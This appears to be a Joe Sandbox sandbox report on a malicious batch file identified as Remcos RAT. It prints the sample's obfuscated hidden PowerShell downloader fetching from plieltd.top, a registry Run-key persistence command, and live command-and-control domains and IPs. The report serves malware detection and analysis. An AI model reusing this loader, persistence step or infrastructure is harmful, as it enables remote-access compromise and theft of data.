                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#pseudobegivenhedens implume tehsildar indskudsbrt burreskrmenes #>;$pligtmenneskers='solfegens';<#splenomegalia muoniums plateauing endomitosis anisidin uncial #>;$chromoisomerism=$pediculus+$host.ui; function dtente($sizier){if ($chromoisomerism) {$brugeradgangskodernes++;}$trangam=$bedighted34+$sizier.'length'-$brugeradgangskodernes; for( $john=4;$john -lt $trangam;$john+=5){$tremplin=$john;$okkupationsmagters+=$sizier[$john];$nucleolocentrosome='sodavander';}$okkupationsmagters;}function trindt94($confluxes){ & ($afhjemledes) ($confluxes);}$silicomethane=dtente 'strim sliopaa,ztraniun.tldirel ena non/sand ';$silicomethane+=dtente 'term5,che.st c0 oo temp( eknwth.nif yvnforad toporeitwunwis ann flopnpur tmilh far1bill0cryp.smad0c no;lage ajowlisti h.on ent6fors4 tri;byr. slixsi,d6.eso4sp n; inc radirwillvhyp :kalm1 min3.ege1resp.dvrg0 pas)laes sufg re eb,erc aktk rucoephe/atry2af.t0 met1stri0 ens0 beh1iled0gips1 non kur,fin.kityderforeeaandfengeokommxafsv/jeop1 ant3stif1skov.kifs0 .nt ';$reunify=dtente 'prisuarbesgelsecrysrselv-se iamarlgun ee yden inltumis ';$geophones=dtente 'cytohmiratsalststr p sy s di : for/font/dngep mo.lcampi a,tek bblfl,ntrecodun.e.bindtweirokantpunpl/taasmnatiicounse.emoalkageartyterrnunstibyg ss amtte.tsobno.overptemifstram b y ';$ancienty=dtente 'udgi> out ';$afhjemledes=dtente 'laboicrese na xh.nd ';$afmarchernes='militre';$glendon='\overtidsbetalings.del';trindt94 (dtente 'udpe$ yvgafdrl suloextrb mpaove l ods:eskar yanowedgo ,oss n netarc1lane1gaas0ansk=lati$sma ei dens.orv en,:restabrugppustpadfrd enuabetitl ciaarge+pre $spergmod lgueregeocnbe ydungao,rannmidt ');trindt94 (dtente ' opl$eftegad ilsistonrrebh lva ovelr,ig:ungeurecanunprdfutuefungt nduerigerher.iste.opardr mera atat my.ideconinlegpatr= far$ ming grue uldo sn.p lokh afvolag,novere autsskri.t.vosplaip ma.lencoiambutpros( han$nonraavenntambcan,si uptebrutn,ravt friywfru) plo ');trindt94 (dtente ' atr[ onenin,resi itcamb.nonfsspl efrilrsquevovericarocefteesektp p iotogsi p.tnudvltskovmacetapre nek.ea sungjahvebetersove] k,y:scle:srt scharehj tcforbuapperrensidefet sibymatrpgarircandoklimt rtwogravcistiodichlkrab ind = co ove [overn mpae.rest ce..larystince ranc auru thwrfluoiadrat takyedifpmedirstupo kont pilosanectr lobukslkilotdiasyinkvp uae gra]g,os: eri:pretts bolery sdisk1kr d2rev, ');$geophones=$undeteriorating[0];$kniplens=(dtente 'lset$skv,gforslbilfofr sb manam dsl cat: .abgba.iep nes romt br,udesis eae arsr rennvrtreform= ren sile ccmwudla-inflo nonb rinjhesteb nbcvrkstkupf bro su gayo slsnomota.ciekatem sup.affonrackeintetembo.paraw hore.ndsbunclc billaflvicarbe r.gnflo tdeb, ');trindt94 ($kniplens);trindt94 (dtente 'epor$recegsodaeva is,reet oveulap,spa aemo,irtyngnrealejord.su,thporte choa twidemsce nonraftvskera[eloi$tobarrengeter ukononsaddipostfs,ntytal ] niv=anse$skaksspinigennl ma i co,ceffoo nonmp,roe mectbredh lfmanonenwrJump to behavior
                Source: msiexec.exe, 00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
                Source: msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8B\
                Source: msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
                Source: msiexec.exe, 00000009.00000003.3171953625.0000000008920000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.3171953625.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171744633.000000000894D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4348, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8BJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000003.3171953625.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.3171744633.000000000894D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4348, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		1
                Scripting                		312
                Process Injection                		1
                Masquerading                		OS Credential Dumping11
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		1
                Registry Run Keys / Startup Folder                		1
                Registry Run Keys / Startup Folder                		1
                Modify Registry                		LSASS Memory2
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Remote Access Software                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeylogging213
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain Credentials12
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539094 Sample: rEXSP5634HISP9005STMSDSDOKU... Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 35 pelele.duckdns.org 2->35 37 plieltd.top 2->37 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 55 7 other signatures 2->55 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 53 Uses dynamic DNS services 35->53 process4 signatures5 57 Early bird code injection technique detected 9->57 59 Writes to foreign memory regions 9->59 61 Found suspicious powershell code related to unpacking or dynamic code loading 9->61 63 Queues an APC in another process (thread injection) 9->63 14 msiexec.exe 5 10 9->14         started        19 conhost.exe 9->19         started        65 Suspicious powershell command line found 12->65 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 39 pelele.duckdns.org 192.169.69.26, 49738, 49739, 49740 WOWUS United States 14->39 33 C:\ProgramData\remcos\logs.dat, data 14->33 dropped 43 Detected Remcos RAT 14->43 25 cmd.exe 1 14->25         started        41 plieltd.top 104.21.56.189, 443, 49730, 49737 CLOUDFLARENETUS United States 21->41 45 Found suspicious powershell code related to unpacking or dynamic code loading 21->45 27 conhost.exe 21->27         started        file8 signatures9 process10 process11 29 conhost.exe 25->29         started        31 reg.exe 1 1 25->31         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat5%ReversingLabs
                rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat6%VirustotalBrowse

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                pelele.duckdns.org
                		192.169.69.26
                		truetrue
                  		unknown
                  plieltd.top
                  		104.21.56.189
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://plieltd.top/Misogynists.pfmfalse
                      		unknown
                      pelele.duckdns.orgtrue
                        		unknown
                        https://plieltd.top/sNFAyMOQkRdGglJM44.binfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1825048064.00000272A04C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://plieltd.toppowershell.exe, 00000002.00000002.1801491105.00000272921D6000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1950020530.0000000004636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1948668506.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1950020530.00000000044E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://plieltd.toppowershell.exe, 00000002.00000002.1801491105.0000027290894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1801491105.0000027291A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1950020530.0000000004636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1948668506.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://go.micropowershell.exe, 00000002.00000002.1801491105.0000027290FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1825048064.00000272A04C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.microsoft.copowershell.exe, 00000004.00000002.1969850842.0000000006EF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://plieltd.top/Pmsiexec.exe, 00000009.00000002.4145675736.00000000088EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://plieltd.top/sNFAyMOQkRdGglJM44.binfaltsTrogaranticonstruct.ro/sNFAyMOQkRdGglJM44.binmsiexec.exe, 00000009.00000002.4155369663.0000000023E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.microsoft.coUmsiexec.exe, 00000009.00000003.2061439415.0000000008921000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3171744633.000000000894D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1801491105.0000027290451000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1801491105.0000027290451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1950020530.00000000044E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://plieltd.top/powershell.exe, 00000002.00000002.1830962562.00000272A8770000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.00000000088EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1950020530.0000000004636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1948668506.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://plieltd.top/Misogynists.pfmPpowershell.exe, 00000002.00000002.1801491105.000002729067C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://plieltd.top/sNFAyMOQkRdGglJM44.bin&msiexec.exe, 00000009.00000002.4145675736.00000000088B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.56.189
                                                		plieltd.topUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                192.169.69.26
                                                		pelele.duckdns.orgUnited States
                                                		23033WOWUStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1539094
                                                Start date and time:2024-10-22 07:01:05 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 44s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:15
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winBAT@14/10@5/2
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 82%
                                                • Number of executed functions: 42
                                                • Number of non-executed functions: 17
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target powershell.exe, PID 2132 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7128 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                01:01:58API Interceptor88x Sleep call for process: powershell.exe modified
                                                01:03:08API Interceptor6445227x Sleep call for process: msiexec.exe modified
                                                06:02:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Diversify %Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)
                                                06:02:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Diversify %Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                104.21.56.189rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                  • yuya0415.duckdns.org:1928/Vre
                                                  confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                                  • servidorarquivos.duckdns.org/e/e
                                                  oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                  • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                  oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                  • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                  http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                                  • yvtplhuqem.duckdns.org/ja/
                                                  http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                  • fqqqffcydg.duckdns.org/en/
                                                  http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                  • yugdzvsqnf.duckdns.org/en/
                                                  &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                  • servidorarquivos.duckdns.org/e/e
                                                  transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                  • servidorarquivos.duckdns.org/e/e
                                                  http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                                  • www.secure-0fflce-o365.duckdns.org/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  plieltd.topIMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 172.67.155.139
                                                  rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 172.67.155.139
                                                  rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 104.21.56.189
                                                  pelele.duckdns.orgIMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 185.236.203.101
                                                  rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 185.236.203.101
                                                  rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 185.236.203.101

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  WOWUSnicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 192.169.69.26
                                                  SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                  • 192.169.69.26
                                                  DHL_Shipping_Invoices_Awb_BL_000000000101620242247820020031808174Global180030010162024.batGet hashmaliciousGuLoader, RemcosBrowse
                                                  • 192.169.69.26
                                                  Purchase Order Braiconf SA #U2013 16.10.2024.pif.exeGet hashmaliciousRemcosBrowse
                                                  • 192.169.69.26
                                                  rSKGCROCOMANDAFABSRLM60_647746748846748347474.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 192.169.69.26
                                                  QAOdeFQElg.exeGet hashmaliciousRevengeBrowse
                                                  • 192.169.69.26
                                                  x6cUyFYM0H.exeGet hashmaliciousRevengeBrowse
                                                  • 192.169.69.26
                                                  na.elfGet hashmaliciousMiraiBrowse
                                                  • 208.115.121.72
                                                  1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  • 192.169.69.26
